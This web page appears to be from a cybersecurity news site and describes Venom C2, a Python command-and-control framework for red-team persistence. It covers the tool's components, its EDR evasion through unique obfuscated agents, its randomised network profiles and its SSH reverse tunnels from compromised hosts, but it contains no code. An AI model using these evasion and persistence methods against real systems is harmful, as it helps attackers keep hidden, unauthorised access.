Venom C2: The Dependency-Free Python Framework for Stealthy Persistence

Venom C2 is a dependency‑free Python3 Command & Control framework for redteam persistence, built to run on systems without installing packages. It comprises a Flask team server, an Electron operator GUI, and a single‑file Python agent that communicates over HTTP/HTTPS using configurable AES‑encrypted JSON messages. Use it to execute commands, manage files, maintain access, and create SSH reverse tunnels from compromised systems.

Background

While escalating network privileges we landed on many production systems running exotic distros and architectures. We wanted to set up persistence, but our arsenal of tools and techniques did not work. Additionally, some of the target systems were running EDR.

These were production systems, so we did not want to install packages. We needed a C2 agent that would run without dependencies. The systems had Python3 installed, so I created Venom C2 mid-engagement; a dependency‑free Python3 C2 agent that just works.

We didn’t want to use off‑the‑shelf C2 agents because of the risk that they could result in detection by the blue team. Unique code is king for bypassing modern day EDRs

Since there were many systems, we automated unique obfuscation, naming, filesystem placement, different network callback domains, and unique network path requests per agent.

Venom C2 Future

• Python3 Flask
• Team server supporting multiple operators
• Saves command history
• Script for configuring agents
• Script for obfuscating agents
• Manages agent connections
• API for communicating with the GUI client
• Custom profiles with random selection from large arrays of:
  • C2 message parameter names
  • Random headers
  • Random JSON attributes with scalable value types

• Electron
• Works on Linux, macOS, Windows
• GUI is a slimmed down version of the Loki GUI

• Python3 without dependencies
• Messages are encrypted using configurable AES keys
• All messages are sent as JSON POST requests
• Custom profiles with random selection from large arrays of:
  • URI base paths (useful for setting up reverse proxy routing)
  • Multiple URI paths for each agent function
  • C2 message parameter names
  • User agents
  • Random headers
  • Random JSON attributes with scalable value types

Install & Use

Support Our Threat Intelligence

If you find our technology report and cybersecurity news helpful, consider supporting our work.

Buy Me a Coffee PayPal Crypto

USDT (TRC20):

TN8BdV8cp4T1Cd28gK9qTAnZknzzuwyUtm Copy

USDT (ERC20):

0x3725e1a7d3bc5765499fa6aaafe307fabcd75bce Copy